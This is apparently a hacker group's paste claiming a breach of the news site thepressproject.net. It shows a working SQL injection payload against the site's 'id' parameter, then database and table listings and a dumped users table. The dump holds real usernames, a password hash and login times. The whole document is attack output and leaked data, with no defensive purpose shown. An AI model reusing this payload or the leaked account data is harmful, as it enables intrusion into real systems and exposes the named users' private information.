[ThePressProject.net] Hacked By AN0NT0XIC & Ap3x

1. Target: http://www.thepressproject.net
2.  
3. Place: GET
4. Parameter: id
5. Type: UNION query
6. Title: MySQL UNION query (NULL) - 60 columns
7. Payload: id=63495' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7571,0x624d7677425575574d77,0x716e776a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
8. web application technology: Apache, PHP 5.4.26
9. back-end DBMS: MySQL >= 5.0.0
10. current user: tpp2user@localhost
11.  
12. available databases [5]:
13. [*] information_schema
14. [*] thepressproject_charts
15. [5 tables]
16. +-------------+
17. | bonds |
18. +---------+---------+
19. | Column | Type |
20. +---------+---------+
21. | country | numeric |
22. | id | numeric |
23. +---------+---------+
24. | commodity |
25. | currency |
26. | indices |
27. | indices_old |
28. +-------------+
29. [*] thepressproject_im
30. [6 tables]
31. +-----------------+
32. | ajaxim_friends |
33. [3 columns]
34. +----------+---------+
35. | Column | Type |
36. +----------+---------+
37. | group_id | numeric |
38. | id | numeric |
39. | user_id | numeric |
40. +----------+---------+
41. | ajaxim_groups |
42. | ajaxim_messages |
43. | ajaxim_status |
44. | ajaxim_users |
45. [4 columns]
46. +------------+---------+
47. | Column | Type |
48. +------------+---------+
49. | last_login | numeric |
50. | password | numeric |
51. | user_id | numeric |
52. | username | numeric |
53. +------------+---------+
54. +---------+-------------+------------------------------------------+---------------------+
55. | user_id | username | password | last_login |
56. +---------+-------------+------------------------------------------+---------------------+
57. | 1 | Komninos | 5b872adaa605f8fbae97cf6cbeb72d7d188fbed5 | 2012-09-20 02:10:47 |
58. | 2 | Byte2admin | <blank> | 2012-09-20 04:21:09 |
59. | 4 | bogdanos | <blank> | 2012-09-20 04:29:10 |
60. | 5 | elissaios | <blank> | 2012-09-20 04:29:44 |
61. | 6 | bitsik | <blank> | 2012-09-20 04:29:44 |
62. | 7 | kpastri | <blank> | 2012-09-20 04:29:57 |
63. | 8 | xstefanou | <blank> | 2012-09-20 04:29:57 |
64. | 9 | tpp | <blank> | 2012-09-20 04:30:15 |
65. | 10 | cool | <blank> | 2012-09-20 04:30:15 |
66. | 11 | pitsirikos | <blank> | 2012-09-20 04:30:24 |
67. | 12 | koufopoulos | <blank> | 2012-09-20 04:30:24 |
68. | 13 | enasgiadyo | <blank> | 2012-09-20 04:30:35 |
69. | 14 | aggela | <blank> | 2012-09-20 04:30:35 |
70. | 15 | sonia | <blank> | 2012-09-20 04:30:47 |
71. | 16 | mike | <blank> | 2012-09-20 04:30:47 |
72. | 17 | ebersi | <blank> | 2012-09-20 04:30:59 |
73. | 18 | sotiris | <blank> | 2012-09-20 04:30:59 |
74. | 19 | eleftheria | <blank> | 2012-09-20 04:31:07 |
75. | 20 | iris | <blank> | 2012-09-20 04:31:07 |
76. | 21 | azenakos | <blank> | 2012-09-20 04:31:16 |
77. | 22 | maro | <blank> | 2012-09-20 04:31:16 |
78. | 23 | poulis | <blank> | 2012-09-20 04:31:24 |
79. | 24 | pantelis | <blank> | 2012-09-20 04:31:24 |
80. +---------+-------------+------------------------------------------+---------------------+
81. | chat |
82. +-----------------+
83. [*] thepressproject_star
84. [2 tables]
85. +-------------+
86. | ratingBans |
87. | ratingItems |
88. +-------------+
89. [*] tpp_b2
90. [75 tables]
91. +--------------------+
92. | #__logs |
93. | #__poll_answers |
94. | #__polls |
95. | #__users |
96. | articles-etetradio |
97. | rates&bonds |
98. | ads |
99. | ads_ct |
100. | ape |
101. | articles |
102. | bytebox |
103. | byteconfig |
104. | bytefiles |
105. | bytegallerys |
106. | bytegallerysize |
107. | bytegories |
108. | bytemaps |
109. | bytephotos |
110. | bytetags |
111. | bytevideos |
112. | cablesgate2 |
113. | cablesgatemore |
114. | cinema |
115. | cinema_3 |
116. | cinema_hall |
117. | cinema_hall_3 |
118. | cinemascreens |
119. | cinemascreens_3 |
120. | comments |
121. | deiktes |
122. | diavgeia |
123. | elef_cinema |
124. | elef_cinema_new |
125. | elef_stock |
126. | elef_stock2 |
127. | f1results |
128. | f2results |
129. | farm |
130. | finance_live |
131. [3 columns]
132. +--------+---------+
133. | Column | Type |
134. +--------+---------+
135. | id | numeric |
136. | name | numeric |
137. | price | numeric |
138. +--------+---------+
139. | finance_new |
140. | ftse_indices |
141. | hospitals |
142. | ksenoi_deiktes |
143. | misc |
144. | movies |
145. | movies_3 |
146. | newsletters |
147. | ofshore |dumped
148. [3 columns]
149. +---------+---------+
150. | Column | Type |
151. +---------+---------+
152. | country | numeric |
153. | id | numeric |
154. | name | numeric |
155. +---------+---------+
156. | podcasts |
157. | ptd |
158. | ratingBans |
159. | ratingItems |
160. | ratings |
161. | sales |
162. | submitcontent |
163. | test_logs |
164. | test_poll_answers |
165. | test_polls |
166. | test_users |
167. | theater |
168. | theater_hall |
169. | theaterplay |
170. | theaterscreens |
171. | tpplive |
172. | twitter |dumped
173. [3 columns]
174. +----------+---------+
175. | Column | Type |
176. +----------+---------+
177. | id | numeric |
178. | name | numeric |
179. | realname | numeric |
180. +----------+---------+
181. | twitterfeed |
182. | visitors |
183. | weather |
184. | widget |
185. | widget_last_update |
186. | widgetlist |
187. | widgetprofiles |
188. | wikileaks2 |
189. | wikileakstran
190. | wrcresults |
191. +--------------------+